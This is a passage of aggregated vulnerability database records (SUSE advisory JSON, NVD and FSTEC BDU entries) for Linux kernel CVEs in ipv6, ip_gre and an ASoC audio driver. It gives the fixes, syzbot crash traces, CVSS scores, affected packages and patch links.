"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: Fix use-after-free in inet6_addr_del().\n\nsyzbot reported use-after-free of inet6_ifaddr in\ninet6_addr_del(). [0]\n\nThe cited commit accidentally moved ipv6_del_addr() for\nmngtmpaddr before reading its ifp-\u003eflags for temporary\naddresses in inet6_addr_del().\n\nLet\u0027s move ipv6_del_addr() down to fix the UAF.\n\n[0]:\nBUG: KASAN: slab-use-after-free in inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117\nRead of size 4 at addr ffff88807b89c86c by task syz.3.1618/9593\n\nCPU: 0 UID: 0 PID: 9593 Comm: syz.3.1618 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xcd/0x630 mm/kasan/report.c:482\n kasan_report+0xe0/0x110 mm/kasan/report.c:595\n inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117\n addrconf_del_ifaddr+0x11e/0x190 net/ipv6/addrconf.c:3181\n inet6_ioctl+0x1e5/0x2b0 net/ipv6/af_inet6.c:582\n sock_do_ioctl+0x118/0x280 net/socket.c:1254\n sock_ioctl+0x227/0x6b0 net/socket.c:1375\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f164cf8f749\nCode: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007f164de64038 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: ffffffffffffffda RBX: 00007f164d1e5fa0 RCX: 00007f164cf8f749\nRDX: 0000200000000000 RSI: 0000000000008936 RDI: 0000000000000003\nRBP: 00007f164d013f91 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007f164d1e6038 R14: 00007f164d1e5fa0 R15: 00007ffde15c8288\n \u003c/TASK\u003e\n\nAllocated by task 9593:\n kasan_save_stack+0x33/0x60 mm/kasan/common.c:56\n kasan_save_track+0x14/0x30 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:397 [inline]\n __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:414\n kmalloc_noprof include/linux/slab.h:957 [inline]\n kzalloc_noprof include/linux/slab.h:1094 [inline]\n ipv6_add_addr+0x4e3/0x2010 net/ipv6/addrconf.c:1120\n inet6_addr_add+0x256/0x9b0 net/ipv6/addrconf.c:3050\n addrconf_add_ifaddr+0x1fc/0x450 net/ipv6/addrconf.c:3160\n inet6_ioctl+0x103/0x2b0 net/ipv6/af_inet6.c:580\n sock_do_ioctl+0x118/0x280 net/socket.c:1254\n sock_ioctl+0x227/0x6b0 net/socket.c:1375\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nFreed by task 6099:\n kasan_save_stack+0x33/0x60 mm/kasan/common.c:56\n kasan_save_track+0x14/0x30 mm/kasan/common.c:77\n kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:584\n poison_slab_object mm/kasan/common.c:252 [inline]\n __kasan_slab_free+0x5f/0x80 mm/kasan/common.c:284\n kasan_slab_free include/linux/kasan.h:234 [inline]\n slab_free_hook mm/slub.c:2540 [inline]\n slab_free_freelist_hook mm/slub.c:2569 [inline]\n slab_free_bulk mm/slub.c:6696 [inline]\n kmem_cache_free_bulk mm/slub.c:7383 [inline]\n kmem_cache_free_bulk+0x2bf/0x680 mm/slub.c:7362\n kfree_bulk include/linux/slab.h:830 [inline]\n kvfree_rcu_bulk+0x1b7/0x1e0 mm/slab_common.c:1523\n kvfree_rcu_drain_ready mm/slab_common.c:1728 [inline]\n kfree_rcu_monitor+0x1d0/0x2f0 mm/slab_common.c:1801\n process_one_work+0x9ba/0x1b20 kernel/workqueue.c:3257\n process_scheduled_works kernel/workqu\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23010",
"url": "https://www.suse.com/security/cve/CVE-2026-23010"
},
{
"category": "external",
"summary": "SUSE Bug 1257332 for CVE-2026-23010",
"url": "https://bugzilla.suse.com/1257332"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-23010"
},
{
"cve": "CVE-2026-23011",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23011"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: ip_gre: make ipgre_header() robust\n\nAnalog to commit db5b4e39c4e6 (\"ip6_gre: make ip6gre_header() robust\")\n\nOver the years, syzbot found many ways to crash the kernel\nin ipgre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ipgre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0\n kernel BUG at net/core/skbuff.c:213 !\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: mld mld_ifc_work\n RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213\nCall Trace:\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23011",
"url": "https://www.suse.com/security/cve/CVE-2026-23011"
},
{
"category": "external",
"summary": "SUSE Bug 1257207 for CVE-2026-23011",
"url": "https://bugzilla.suse.com/1257207"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2026-23011"
}
]
}
FKIE_CVE-2026-23006
Vulnerability from fkie_nvd - Published: 2026-01-25 15:15 - Updated: 2026-03-25 19:21
Severity ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ASoC: tlv320adcx140: fix null pointer
The "snd_soc_component" in "adcx140_priv" was only used once but never
set. It was only used for reaching "dev" which is already present in
"adcx140_priv".
References
| URL | Tags | ||
|---|---|---|---|
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/53bd838ed5950cb18927e4b2e8ee841b7cb10929 | Patch | |
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/61757f5191daab863d25f03680e912b5449a1eed | Patch | |
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/659939d08e5f7bc17b941c53e8c9c0a6c6113b21 | Patch | |
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/954260a32c21d5072d8e7253c0a8b1627927cb02 | Patch | |
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/be7664c81d3129fc313ef62ff275fd3d33cfecd4 | Patch |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| linux | linux_kernel | * | |
| linux | linux_kernel | * | |
| linux | linux_kernel | * | |
| linux | linux_kernel | * | |
| linux | linux_kernel | 6.1 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 | |
| linux | linux_kernel | 6.19 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FC8A14F3-D16F-4AB8-A56B-58BFF0518CEE",
"versionEndExcluding": "6.1.162",
"versionStartIncluding": "6.1.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8EAAE395-0162-4BAF-9AD5-E9AF3C869C4F",
"versionEndExcluding": "6.6.122",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7456F614-6AA8-4C08-8229-BA342D4AFBAD",
"versionEndExcluding": "6.12.67",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "99FF3E05-0E7A-44E9-8E47-BF6F1F8EC436",
"versionEndExcluding": "6.18.7",
"versionStartIncluding": "6.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.1:-:*:*:*:*:*:*",
"matchCriteriaId": "DE093B34-F4CD-4052-8122-730D6537A91A",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*",
"matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*",
"matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*",
"matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*",
"matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*",
"matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*",
"matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*",
"matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*",
"matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\"."
},
{
"lang": "es",
"value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nASoC: tlv320adcx140: correcci\u00f3n de puntero nulo\n\nEl \u0027snd_soc_component\u0027 en \u0027adcx140_priv\u0027 solo se us\u00f3 una vez pero nunca se configur\u00f3. Solo se us\u00f3 para alcanzar \u0027dev\u0027, que ya est\u00e1 presente en \u0027adcx140_priv\u0027."
}
],
"id": "CVE-2026-23006",
"lastModified": "2026-03-25T19:21:56.440",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2026-01-25T15:15:55.480",
"references": [
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/53bd838ed5950cb18927e4b2e8ee841b7cb10929"
},
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/61757f5191daab863d25f03680e912b5449a1eed"
},
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/659939d08e5f7bc17b941c53e8c9c0a6c6113b21"
},
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/954260a32c21d5072d8e7253c0a8b1627927cb02"
},
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/be7664c81d3129fc313ef62ff275fd3d33cfecd4"
}
],
"sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-476"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
BDU:2026-01114
Vulnerability from fstec - Published: 25.01.2026
VLAI Severity ?
Title
Уязвимость компонента ASoC ядра операционной системы Linux, позволяющая нарушителю вызвать отказ в обслуживании
Description
Уязвимость компонента ASoC ядра операционной системы связана с ошибкой разыменования нулевого указателя. Эксплуатация уязвимости может позволить нарушителю вызвать отказ в обслуживании
Severity ?
Vendor
Сообщество свободного программного обеспечения
Software Name
Linux
Software Version
от 6.18 до 6.18.7 (Linux), до 6.19 rc6 (Linux), от 6.1 до 6.12.67 (Linux)
Possible Mitigations
В условиях отсутствия обновлений безопасности от производителя рекомендуется придерживаться "Рекомендаций по безопасной настройке операционных систем LINUX", изложенных в методическом документе ФСТЭК России, утверждённом 25 декабря 2022 года.
Использование рекомендаций:
Для Linux:
https://lore.kernel.org/linux-cve-announce/2026012536-CVE-2026-23006-241b@gregkh/
https://git.kernel.org/stable/c/53bd838ed5950cb18927e4b2e8ee841b7cb10929
https://git.kernel.org/stable/c/61757f5191daab863d25f03680e912b5449a1eed
https://git.kernel.org/stable/c/659939d08e5f7bc17b941c53e8c9c0a6c6113b21
https://git.kernel.org/stable/c/be7664c81d3129fc313ef62ff275fd3d33cfecd4
Reference
https://lore.kernel.org/linux-cve-announce/2026012536-CVE-2026-23006-241b@gregkh/
https://git.kernel.org/stable/c/53bd838ed5950cb18927e4b2e8ee841b7cb10929
https://git.kernel.org/stable/c/61757f5191daab863d25f03680e912b5449a1eed
https://git.kernel.org/stable/c/659939d08e5f7bc17b941c53e8c9c0a6c6113b21
https://git.kernel.org/stable/c/be7664c81d3129fc313ef62ff275fd3d33cfecd4
CWE
CWE-476
{
"CVSS 2.0": "AV:L/AC:L/Au:S/C:N/I:N/A:C",
"CVSS 3.0": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"CVSS 4.0": null,
"remediation_\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": null,
"remediation_\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435": null,
"\u0412\u0435\u043d\u0434\u043e\u0440 \u041f\u041e": "\u0421\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u043e \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f",
"\u0412\u0435\u0440\u0441\u0438\u044f \u041f\u041e": "\u043e\u0442 6.18 \u0434\u043e 6.18.7 (Linux), \u0434\u043e 6.19 rc6 (Linux), \u043e\u0442 6.1 \u0434\u043e 6.12.67 (Linux)",
"\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u043f\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e": "\u0412 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0442 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044f \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0442\u044c\u0441\u044f \"\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c LINUX\", \u0438\u0437\u043b\u043e\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043c\u0435\u0442\u043e\u0434\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0435 \u0424\u0421\u0422\u042d\u041a \u0420\u043e\u0441\u0441\u0438\u0438, \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0451\u043d\u043d\u043e\u043c 25 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430.\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439:\n\u0414\u043b\u044f Linux:\nhttps://lore.kernel.org/linux-cve-announce/2026012536-CVE-2026-23006-241b@gregkh/\nhttps://git.kernel.org/stable/c/53bd838ed5950cb18927e4b2e8ee841b7cb10929\t\nhttps://git.kernel.org/stable/c/61757f5191daab863d25f03680e912b5449a1eed\t\nhttps://git.kernel.org/stable/c/659939d08e5f7bc17b941c53e8c9c0a6c6113b21\t\nhttps://git.kernel.org/stable/c/be7664c81d3129fc313ef62ff275fd3d33cfecd4",
"\u0414\u0430\u0442\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f": "25.01.2026",
"\u0414\u0430\u0442\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f": "02.02.2026",
"\u0414\u0430\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438": "02.02.2026",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440": "BDU:2026-01114",
"\u0418\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "CVE-2026-23006",
"\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430",
"\u041a\u043b\u0430\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043a\u043e\u0434\u0430",
"\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u041f\u041e": "Linux",
